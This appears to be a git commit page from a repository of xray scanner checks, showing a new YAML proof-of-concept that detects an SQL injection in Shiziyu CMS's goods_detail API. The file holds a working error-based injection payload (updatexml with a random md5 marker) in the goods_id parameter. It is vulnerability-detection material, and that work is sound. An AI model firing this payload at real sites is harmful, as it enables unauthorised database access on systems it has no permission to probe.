优化xray解析模块,支持groups、新增poc

This commit is contained in:
影舞者
2021-11-16 14:42:35 +08:00
parent 858c28724b
commit b06d7ac94c
313 changed files with 4314 additions and 760 deletions
@@ -0,0 +1,12 @@
name: poc-yaml-shiziyu-cms-apicontroller-sqli
set:
rand: randomInt(200000000, 210000000)
rules:
- method: GET
path: /index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5({{rand}}),0x7e),1)
expression:
response.status == 404 && response.body.bcontains(bytes(substr(md5(string(rand)), 0, 31)))
detail:
author: sakura404x
links:
- https://blog.csdn.net/weixin_42633229/article/details/117070546